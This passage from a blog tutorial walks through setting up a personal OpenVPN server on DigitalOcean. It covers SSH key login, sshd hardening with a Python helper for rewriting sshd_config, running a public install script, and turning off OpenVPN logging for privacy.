<p>We will choose the following image with the cheapest plan (<strong>Ubuntu 20.04 for $5 per month</strong>; remember you get $100 free if you use my link). We can also choose the location of our server (in my case I will use Frankfurt, Germany) and create credentials for the root user.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_002.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_002.png" /></a></p>
<h1 id="generate-ssh-keys">Generate SSH keys</h1>
<p>In the previous step we created a password for the root user, but using plain passwords to log in to our machine is not a good idea, since they can be exposed on the network. Therefore, we will generate keys so that only machines that have them (and the password) can log in.</p>
<p>We can generate the keys in the following way:</p>
<ul>
<li>Windows (with Powershell):</li>
</ul>
<pre><code class="language-ps1">PS C:\> Add-WindowsCapability -Online -Name OpenSSH.Client*
PS C:\> ssh-keygen -t rsa -b 4096
</code></pre>
<ul>
<li>Linux and Mac:</li>
</ul>
<pre><code class="language-bash">ssh-keygen -t rsa -b 4096
</code></pre>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_003.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_003.png" /></a></p>
<h1 id="login-to-the-server-and-update">Login to the server and update</h1>
<p>We log in to our server, remember that you can see the IP of your machine in the DigitalOcean main panel.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_004.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_004.png" /></a></p>
<pre><code class="language-bash">ssh root@[IP]
</code></pre>
<p>Enter the password you specified when creating the machine and execute the update commands.</p>
<pre><code class="language-bash">apt-get update && apt-get upgrade
</code></pre>
<h1 id="create-a-user">Create a user</h1>
<p>Although the root user allows us to perform any action on the machine, it is not recommended to let it log in over SSH. Therefore, we will create a user with permission to use sudo and with bash as the default shell.</p>
<pre><code class="language-bash">useradd -G sudo -m jolmedo -s /bin/bash
</code></pre>
<p>Then we will create a password.</p>
<pre><code class="language-bash">passwd jolmedo
</code></pre>
<h1 id="copy-ssh-keys-to-the-server">Copy SSH keys to the server</h1>
<p>In this step, we are going to copy the SSH keys generated from the previous step to our cloud machine.</p>
<ul>
<li>Windows (with Powershell):</li>
</ul>
<pre><code class="language-ps1">type $env:USERPROFILE\.ssh\id_rsa.pub | ssh jolmedo@[IP] "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"
</code></pre>
<ul>
<li>Linux and Mac:</li>
</ul>
<pre><code class="language-bash">ssh-copy-id jolmedo@[IP]
</code></pre>
<h1 id="disable-password-authentication-and-security-settings-for-ssh">Disable password authentication and security settings for SSH</h1>
<p>Once we have the SSH keys on the server, we will proceed to disable password authentication and rely on public-key authentication. Edit the sshd configuration file.</p>
<pre><code class="language-bash">nano /etc/ssh/sshd_config
</code></pre>
<p>First of all, let’s change the default SSH port. You can use any port (I will use 22022); this helps to keep scanners from trying to log in to our server with default credentials.</p>
<pre><code class="language-bash"># Port 22
Port 22022
</code></pre>
<p>Disable password authentication (you can only log in with public key).</p>
<pre><code class="language-bash">PasswordAuthentication no
</code></pre>
<p>Disable root login.</p>
<pre><code class="language-bash">PermitRootLogin no
</code></pre>
<p>Finally, we restart SSH to apply changes.</p>
<pre><code class="language-bash">systemctl restart sshd
</code></pre>
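<p>An added example, not part of the original tutorial: applying the three <code>sshd_config</code> changes above from a script while respecting sshd’s first-match rule (the first active occurrence of a directive wins, and files pulled in by an <code>Include</code> line are read first), then reporting the value sshd will actually use. The sample configuration is constructed; the <code>Include</code> line mirrors what Ubuntu 20.04 ships.</p>

```python
"""Added example (not from the original tutorial): apply the port change,
PasswordAuthentication no and PermitRootLogin no to an sshd_config text the
way sshd reads it: first active occurrence wins, Include files come first,
and everything after a Match line is conditional."""
import re
import shutil
import subprocess
from pathlib import Path
from typing import Dict, List, Optional

HARDENING = {"Port": "22022", "PasswordAuthentication": "no", "PermitRootLogin": "no"}
# "Key value" form; commented lines such as "#Port 22" deliberately do not match.
DIRECTIVE_RE = re.compile(r"^\s*([A-Za-z]+)\s+(.*?)\s*$")

# Constructed sample: Ubuntu-style Include at the top, a commented-out Port,
# a duplicate directive and a Match block that must stay untouched.
SAMPLE_CONFIG = (
    "Include /etc/ssh/sshd_config.d/*.conf\n#Port 22\n"
    "PasswordAuthentication yes\nPermitRootLogin yes\nPasswordAuthentication no\n"
    "Match User backup\n    PasswordAuthentication yes\n"
)


def _key(line: str) -> Optional[str]:
    m = DIRECTIVE_RE.match(line)
    return m.group(1).lower() if m else None


def effective_value(config_text: str, key: str) -> Optional[str]:
    """The value sshd uses for `key`: first active line, case-insensitive match."""
    for line in config_text.splitlines():
        if _key(line) == key.lower():
            return DIRECTIVE_RE.match(line).group(2)
    return None


def includes(config_text: str) -> List[str]:
    """Include targets; they are read first and can pre-empt anything set here."""
    return [DIRECTIVE_RE.match(line).group(2)
            for line in config_text.splitlines() if _key(line) == "include"]


def apply_hardening(config_text: str, settings: Dict[str, str] = HARDENING) -> str:
    """Rewrite the first active line of each key, comment out later duplicates,
    and add missing keys BEFORE the first Match block."""
    wanted = {k.lower(): k for k in settings}
    head: List[str] = []
    tail: List[str] = []
    seen = set()
    for line in config_text.splitlines():
        k = _key(line)
        if tail or k == "match":
            tail.append(line)  # Match block and everything after it: untouched
            continue
        if k in wanted:
            name = wanted[k]
            if name in seen:
                head.append(f"# {line.strip()}")  # sshd would have ignored it anyway
            else:
                head.append(f"{name} {settings[name]}")
                seen.add(name)
            continue
        head.append(line)
    for name, value in settings.items():
        if name not in seen:
            head.append(f"{name} {value}")
    return "\n".join(head + tail) + "\n"


def harden_file(path: Path, settings: Dict[str, str] = HARDENING) -> Dict[str, Optional[str]]:
    """Back up, rewrite, and return the effective values for a final check."""
    original = path.read_text()
    path.with_name(path.name + ".bak").write_text(original)
    hardened = apply_hardening(original, settings)
    path.write_text(hardened)
    return {name: effective_value(hardened, name) for name in settings}


def validate_with_sshd(path: Path) -> Optional[bool]:
    """Syntax-check the written file with `sshd -t -f` when the binary is present."""
    sshd = shutil.which("sshd") or shutil.which("sshd", path="/usr/sbin:/usr/local/sbin")
    if sshd is None:
        return None  # cannot validate on this host
    return subprocess.run([sshd, "-t", "-f", str(path)], capture_output=True).returncode == 0


if __name__ == "__main__":
    print("includes to review first:", includes(SAMPLE_CONFIG))
    print(apply_hardening(SAMPLE_CONFIG))
```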
<h1 id="openvpn-configuration">OpenVPN Configuration</h1>
<p>Here comes the highlight of the tutorial, configuring OpenVPN can take some time (installing packages, generating keys, configuring IPTables, generating configuration files, etc), but thanks to the work of a GitHub user, we can do it in a very simple way.</p>
<p>First, download the repository.</p>
<pre><code class="language-bash">git clone https://github.com/Nyr/openvpn-install.git
</code></pre>
<p>Change into the directory.</p>
<pre><code class="language-bash">cd openvpn-install/
</code></pre>
<p>Run the script.</p>
<pre><code class="language-bash">sudo bash openvpn-install.sh
</code></pre>
<p>NOTE: Whenever you download any script, make sure there is nothing suspicious in it.</p>
<p>Once executed, we only have to answer a few questions.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_005.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_005.png" /></a></p>
<p>As you may have noticed in the previous screenshot, I changed the OpenVPN default port to 443 because some networks block the default port. You may wonder whether using 443 (the same port as HTTPS) causes problems, but HTTPS uses TCP while OpenVPN here uses UDP, so there is no conflict between them.</p>
<p>After answering the questions, the installation process will begin. When it finishes, the .ovpn configuration file will be in the root user’s home folder; let’s move it to the jolmedo user’s folder and make that user its owner.</p>
<pre><code class="language-bash">sudo mv /root/hackpuntes-vps.ovpn ~
</code></pre>
<pre><code class="language-bash">sudo chown jolmedo hackpuntes-vps.ovpn
</code></pre>
<h1 id="disable-logs-in-our-vpn">Disable logs in our VPN</h1>
<p>With everything prepared, there is one very important thing left to do on the server side: disable the logs. To do so, we modify the following file.</p>
<pre><code class="language-bash">sudo nano /etc/openvpn/server/server.conf
</code></pre>
<p>We look for the <code>verb 3</code> line and change it to <code>verb 0</code>. Now we restart OpenVPN.</p>
<pre><code class="language-bash">systemctl restart openvpn-server@server.service
</code></pre>
<p>We now have a VPN that does not actually keep logs.</p>
<h1 id="test-the-vpn">Test the VPN</h1>
<p>We download the hackpuntes-vps.ovpn file to our local machine and create a new VPN connection.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_006.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_006.png" /></a></p>
<p>Choose Import a saved VPN configuration…
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_007.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_007.png" /></a></p>
<p>Select the file hackpuntes-vps.ovpn
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_008.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_008.png" /></a></p>
<p>And we will see something similar to the following:
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_009.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_009.png" /></a></p>
<p>Save the changes and we now have our VPN fully functional and without logging.
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_010.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_010.png" /></a></p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_011.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_011.png" /></a></p>
<p>We can use <a href="https://whoer.net">WHOER</a> to find out what information we expose and confirm that our VPN is in use.</p>
<p>Having a log-free personal VPN allows you to maintain an acceptable level of anonymity and privacy on the network; this post has shown how to configure one with DigitalOcean.</p>